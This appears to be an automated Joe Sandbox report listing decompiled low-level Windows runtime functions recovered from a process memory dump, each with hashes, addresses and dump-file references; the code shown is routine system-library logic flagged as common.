Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f35f5d3f6d59d41ae5e8603e6b7f4f6329645eec60cd0b2fc22d675e08cbdc
Instruction ID: 7d0822c64610c1014514181783fd5bc0e5594c0f0dc420ced76636bcbb526a22
Opcode Fuzzy Hash: 62f35f5d3f6d59d41ae5e8603e6b7f4f6329645eec60cd0b2fc22d675e08cbdc
Instruction Fuzzy Hash: BCF027B1613694DFD722A79FC448B3277D7DB01778F0D8169D40687512D724FA80E6D4

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2539 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E04CF2539(void* __ecx) {
				signed int _t9;
				void* _t12;

				_t9 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t9 != 0) {
					E04CF8F40(_t9, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t9 + 0x24)) = 1;
					E04CF2581(_t9, _t12);
				}
				return _t9;
			}

0x04cf2554
0x04cf2558
0x04cf255e
0x04cf2569
0x04cf256c
0x04cf256d
0x04cf256e
0x04cf256f
0x04cf2576
0x04cf2576
0x04cf2580

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction ID: 1ff396446f3dee374e534a67aed3db3eb17640c682f19bc73925d6f2d0372fc0
Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction Fuzzy Hash: AEE092723406402BE751AE598CD4F47779FDFC2714F040479BA045E141CAE6BD0982A0

Uniqueness

Uniqueness Score: -1.00%

Function 04CECEA0 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CECEA0(signed int _a4, intOrPtr _a8) {
				char* _t12;
				intOrPtr _t19;

				_t19 = _a8;
				if(E04CC3C40() != 0) {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t12 = 0x7ffe0386;
				}
				if( *_t12 != 0) {
					E04D84B67( *((intOrPtr*)(_t19 - 0x1c)), _t19,  *((intOrPtr*)(_t19 - 0x48)),  *((intOrPtr*)(_t19 - 0x44)),  *((intOrPtr*)(_t19 - 0x3c)));
				}
				return E04CB5622(_a4, _t19 - 0x78, 0x102);
			}

0x04cecea7
0x04ceceb1
0x04d2892a
0x04ceceb7
0x04ceceb7
0x04ceceb7
0x04cecebf
0x04d28942
0x04d28942
0x04ceced8

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0abb894f7510a6b357e4a83ede505299fed7691ba1db346d194fdca9d1db46
Instruction ID: e56c136c5410c8f317908ae40ed932c059ddcb27109f90e28c407b791cbf2bc0
Opcode Fuzzy Hash: ca0abb894f7510a6b357e4a83ede505299fed7691ba1db346d194fdca9d1db46
Instruction Fuzzy Hash: 5BF08232604155ABD711AA56D800EAEFB6AEFD1754F148016F9504B250E731B861EB51

Uniqueness

Uniqueness Score: -1.00%

Function 04D84E62 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04D84E62(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4dab370 ^ _t26;
				_v20 = __ecx;
				_v46 = 0x1c27;
				_v16 = __edx;
				if(E04CC3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04d84e62
0x04d84e71
0x04d84e79
0x04d84e7c
0x04d84e80
0x04d84e8a
0x04d84e9c
0x04d84e8c
0x04d84e95
0x04d84e95
0x04d84ea7
0x04d84ea8
0x04d84eaa
0x04d84eaf
0x04d84ec0

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d243faf07b3d09bb6f3dab1835111a5619f09ebe1c0b899b5ff6136b3d9ba6
Instruction ID: 716aea048ba1525fee8cc97e0e47ed10565de4625bf7a00fa87f65e1a6d4c716
Opcode Fuzzy Hash: 27d243faf07b3d09bb6f3dab1835111a5619f09ebe1c0b899b5ff6136b3d9ba6
Instruction Fuzzy Hash: 66F05E70A10259AFDB04EFA8E955E7EB7B9EF54708F004499A911EB281EA38E900DB54

Uniqueness

Uniqueness Score: -1.00%

Function 04D84E03 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04D84E03(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4dab370 ^ _t26;
				_v20 = __ecx;
				_v46 = 0x1c28;
				_v16 = __edx;
				if(E04CC3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04d84e03
0x04d84e12
0x04d84e1a
0x04d84e1d
0x04d84e21
0x04d84e2b
0x04d84e3d
0x04d84e2d
0x04d84e36
0x04d84e36
0x04d84e48
0x04d84e49
0x04d84e4b
0x04d84e50
0x04d84e61

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5209773df3afd38bee87f114564ce4376f026df90cf8e7e65ada4847716fd40
Instruction ID: 9c9dc4dbd3e9eb69f1cb791de9405b12dab06a2b8c4bb13f80c2f079429f559f
Opcode Fuzzy Hash: e5209773df3afd38bee87f114564ce4376f026df90cf8e7e65ada4847716fd40
Instruction Fuzzy Hash: CEF05E70A10659AFDB04EBA8E915E6EB7F8FF04708F404499A651EB281EA38E9019B54

Uniqueness

Uniqueness Score: -1.00%

Function 04D84F1D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04D84F1D(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4dab370 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04CC3C40() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04d84f1d
0x04d84f2c
0x04d84f34
0x04d84f37
0x04d84f3b
0x04d84f45
0x04d84f57
0x04d84f47
0x04d84f50
0x04d84f50
0x04d84f62
0x04d84f63
0x04d84f65
0x04d84f6a
0x04d84f7b

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b011a3d331907f3763f7eeefad540ce1dff55f87d3ad8048c6ada3b3f00ceacd
Instruction ID: e5ad752b37caca5025f88d3646763d3c5ce1ff91f546d0380ca460d282d7c74f
Opcode Fuzzy Hash: b011a3d331907f3763f7eeefad540ce1dff55f87d3ad8048c6ada3b3f00ceacd
Instruction Fuzzy Hash: 31F0B470A102489FDB04EBB8D845A6EB7F4EF04304F00809DF515EB281EA38F9009714

Uniqueness

Uniqueness Score: -1.00%

Function 04D2CCF0 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04D2CCF0(signed int _a4) {
				signed int _v12;
				signed int _v16;
				void* _t15;
				signed int _t17;

				_v16 = _v16 & 0x00000000;
				_t12 = _a4;
				_push(0x18);
				_push((_t17 & 0xfffffff8) - 0x18);
				_push(0x20);
				_push(0xfffffffe);
				_v12 = _a4;
				_t15 = E04CF2A60();
				if(_t15 >= 0) {
					E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t12);
				}
				return _t15;
			}

0x04d2ccfb
0x04d2cd05
0x04d2cd08
0x04d2cd0a
0x04d2cd0b
0x04d2cd0d
0x04d2cd0f
0x04d2cd18
0x04d2cd1c
0x04d2cd2b
0x04d2cd2b
0x04d2cd37

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
Instruction ID: b516212a685a03e912f9b7f7f2d0f3c8d2e37ce3bbd954808da3b6b7beec0886
Opcode Fuzzy Hash: 69755a8240fa41aff46edcf645f2ffccc7228de35c2e91f0295f4c43bde1223c
Instruction Fuzzy Hash: 25F0E53391061467D231AA098C05F9BBBACDBD4B34F10432AFA249B1D0DA70FA11D7E5

Uniqueness

Uniqueness Score: -1.00%

Function 04D84DA7 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04D84DA7(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dab370 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c25;
				if(E04CC3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x20402);
				_push( *_t11 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04d84db6
0x04d84dbe
0x04d84dc1
0x04d84dcc
0x04d84dde
0x04d84dce
0x04d84dd7
0x04d84dd7
0x04d84de9
0x04d84dea
0x04d84dec
0x04d84df1
0x04d84e02

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05bed91c715e7399a30c832ec7fd4e4b2ea372c451d0e793b90bcd75b91a552
Instruction ID: 9de9cb04a8e955fbd0eceb73df0683660db725dab432a25dfcab9525623c9897
Opcode Fuzzy Hash: e05bed91c715e7399a30c832ec7fd4e4b2ea372c451d0e793b90bcd75b91a552
Instruction Fuzzy Hash: DEF08970A10259ABDB04EB64D915F7E73B4EF04704F000459B601DB281EA78E901D754

Uniqueness

Uniqueness Score: -1.00%

Function 04D84D4B Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04D84D4B(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dab370 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04CC3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04d84d5a
0x04d84d62
0x04d84d65
0x04d84d70
0x04d84d82
0x04d84d72
0x04d84d7b
0x04d84d7b
0x04d84d8d
0x04d84d8e
0x04d84d90
0x04d84d95
0x04d84da6

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc56ffb9aa20c691d7875d8564be5a72117329bb1c02593c944632d5c107cec
Instruction ID: 73f86718a6e3c992b2cf60fd39c5c98d6f0c4297f025186a0ffd2212c2498345
Opcode Fuzzy Hash: fbc56ffb9aa20c691d7875d8564be5a72117329bb1c02593c944632d5c107cec
Instruction Fuzzy Hash: D3F08270A10259ABEB04EBA9D915E7EB3B8EF04708F040499BA01EB2C1EA74E900D758

Uniqueness

Uniqueness Score: -1.00%

Function 04D84EC1 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04D84EC1(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dab370 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04CC3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04d84ed0
0x04d84ed8
0x04d84edb
0x04d84ee6
0x04d84ef8
0x04d84ee8
0x04d84ef1
0x04d84ef1
0x04d84f03
0x04d84f04
0x04d84f06
0x04d84f0b
0x04d84f1c

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e057ad335a3232c9c8f3f460d9384d70b4057ba472856fcf24789a433d7b6fed
Instruction ID: e7394cee8bb61ad6be07a2986457b24cffbe8e4a6fbbc10aa633a03f6191bc75
Opcode Fuzzy Hash: e057ad335a3232c9c8f3f460d9384d70b4057ba472856fcf24789a433d7b6fed
Instruction Fuzzy Hash: 35F08270A10249ABDB04EBA8D955EAE77B8EF08308F500499E512EB2C1EA38E9009714

Uniqueness

Uniqueness Score: -1.00%

Function 04D84FFF Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04D84FFF(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dab370 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2e;
				if(E04CC3C40() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04d8500e
0x04d85016
0x04d85019
0x04d85024
0x04d85036
0x04d85026
0x04d8502f
0x04d8502f
0x04d85041
0x04d85042
0x04d85044
0x04d85049
0x04d8505a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e3864ae46fd81a390234625836d195558333c3012dc97aa9423c734ecca704
Instruction ID: 8347d44ff90d475d151d8ad6876560aa38bd28836c6a404d6a156138616d6eff
Opcode Fuzzy Hash: 50e3864ae46fd81a390234625836d195558333c3012dc97aa9423c734ecca704
Instruction Fuzzy Hash: 1AF08970B10244ABDB14EB64E955E9E77B4EF04708F500099E601EB281E634E9019754

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0630 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CB0630(intOrPtr* _a4) {
				void* _t5;
				intOrPtr _t12;
				intOrPtr* _t14;

				_t5 = E04CC3C40();
				if(_t5 != 0) {
					_t12 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x10));
					L3:
					 *_a4 = _t12;
					L4:
					return 1;
				}
				if( *0x7ffe0268 == _t5) {
					_t14 = _a4;
					if(E04D638FF(_t14) >= 0) {
						goto L4;
					}
					 *_t14 = 1;
					return 0;
				}
				_t12 =  *0x7ffe0264;
				goto L3;
			}

0x04cb0636
0x04cb063d
0x04d0ea29
0x04cb0655
0x04cb0658
0x04cb065a
0x00000000
0x04cb065a
0x04cb0649
0x04d0ea01
0x04d0ea0d
0x00000000
0x00000000
0x04d0ea15
0x00000000
0x04d0ea15
0x04cb064f
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
Instruction ID: 0963e64aebc807f211f156599fcfbadf19b33ddf6598ccc343571d01f78744b5
Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
Instruction Fuzzy Hash: 69F0A0353043449FDB05CF16D040AEA7BE5BB953A0F044499EC468B350E731FC81C781

Uniqueness

Uniqueness Score: -1.00%

Function 04CA8DCD Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04CA8DCD(signed int __ecx) {
				signed int _t14;
				signed int _t17;

				_t14 = __ecx;
				_t17 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x24)) != 0) {
					_push(0);
					_push( *((intOrPtr*)(__ecx + 0x24)));
					E04CF2A70();
				}
				if( *((intOrPtr*)(_t17 + 8)) != 0) {
					_push( *((intOrPtr*)(_t17 + 8)));
					E04CF2A80();
				}
				asm("lock xadd [eax], ecx");
				if((_t14 | 0xffffffff) == 0) {
					E04CA8C3D( *((intOrPtr*)(_t17 + 0x1c)));
				}
				return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t17);
			}

0x04ca8dcd
0x04ca8dd0
0x04ca8dd6
0x04d0b67e
0x04d0b680
0x04d0b683
0x04d0b683
0x04ca8de0
0x04d0b68d
0x04d0b690
0x04d0b690
0x04ca8dec
0x04ca8df0
0x04d0b69d
0x04d0b69d
0x04ca8e08

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
Instruction ID: 2371cd6fb6dce94b257693d0f3c6520afd681cc64622c0998dbf19095f50ff06
Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
Instruction Fuzzy Hash: 3BF08C30A05A02DFD7316A55DC10B5277A2FF40728F05866EE1560B8E0CA64B852EA54

Uniqueness

Uniqueness Score: -1.00%

Function 04CE8E15 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28097f538adc7409b8fbd8ab6a78a1db0afebf2b8c17f67a0e1accbbee84f09
Instruction ID: 1934ae1eed927b74ff7b4697d79fa933da421f9b754910306f61f3091634f701
Opcode Fuzzy Hash: e28097f538adc7409b8fbd8ab6a78a1db0afebf2b8c17f67a0e1accbbee84f09
Instruction Fuzzy Hash: E5E0D83C7055509BCF226F22A6243793BD2AF01F50B0808D8D808AB791C719ED12EA64

Uniqueness

Uniqueness Score: -1.00%

Function 04CB2500 Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04CB2500(signed int __edx, signed int _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t10;
				void* _t14;
				void* _t19;
				signed int _t20;
				void* _t21;

				_t20 = _a4;
				E04CB491F( *((intOrPtr*)(_t20 + 0x5c)), __edx | 0xffffffff);
				E04CB254C(_t14, _t20, _t19, _t20, _t21);
				_push( *((intOrPtr*)(_t20 + 0xe4)));
				E04CF2A80();
				_t10 =  *0x4da6644; // 0x0
				 *(_t20 + 0x118) =  *(_t20 + 0x118) & 0x00000000;
				return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t10 + 0x1c0000, _t20);
			}

0x04cb2506
0x04cb250f
0x04cb2516
0x04cb251b
0x04cb2521
0x04cb2526
0x04cb252b
0x04cb2549

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ed6858e1478ff62f4f260024093083b793138c4dd2d68a8e2c9e18c5ffcaa38
Instruction ID: 526b74e2f89f380f3c44c354bf4206e5493ab16a5fc48c4a07d9ac4918e62fe8
Opcode Fuzzy Hash: 6ed6858e1478ff62f4f260024093083b793138c4dd2d68a8e2c9e18c5ffcaa38
Instruction Fuzzy Hash: FFE09232100544ABD321FB18DD15FDA779AEF90368F044128F156571A1CA34FD10D7C4

Uniqueness

Uniqueness Score: -1.00%

Function 04CA81EB Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04CA81EB(signed int __ecx) {
				signed int _t9;

				_t9 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					_push(0);
					_push( *((intOrPtr*)(__ecx + 0x2c)));
					E04CF2A70();
				}
				if( *_t9 != 0) {
					_push( *_t9);
					E04CF2A80();
				}
				return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t9);
			}

0x04ca81ee
0x04ca81f4
0x04d0b300
0x04d0b302
0x04d0b305
0x04d0b305
0x04ca81fd
0x04ca8212
0x04ca8214
0x04ca8214
0x04ca8211

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction ID: 0e0b0dcb3f6076594b6c243a56d6e6a18ad53e6b9ffc2454c5fbf0d57a01812f
Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction Fuzzy Hash: FAE08C31154511EFEB313E21EC04FA176A3FF40718F2445AAE286060A08BB9BCA1EA98

Uniqueness

Uniqueness Score: -1.00%

Function 04CA8C3D Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04CA8C3D(signed int __ecx) {
				signed int _t11;

				_t11 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
					_push( *((intOrPtr*)(__ecx + 0x14)));
					E04CF30B0();
				} else {
					if( *((intOrPtr*)(__ecx + 8)) != 0) {
						_push(0);
						_push( *((intOrPtr*)(__ecx + 8)));
						E04CF2A70();
					}
				}
				return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t11);
			}

0x04ca8c40
0x04ca8c46
0x04d0b645
0x04d0b648
0x04ca8c4c
0x04ca8c50
0x04ca8c65
0x04ca8c67
0x04ca8c6a
0x04ca8c6a
0x04ca8c50
0x04ca8c64

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
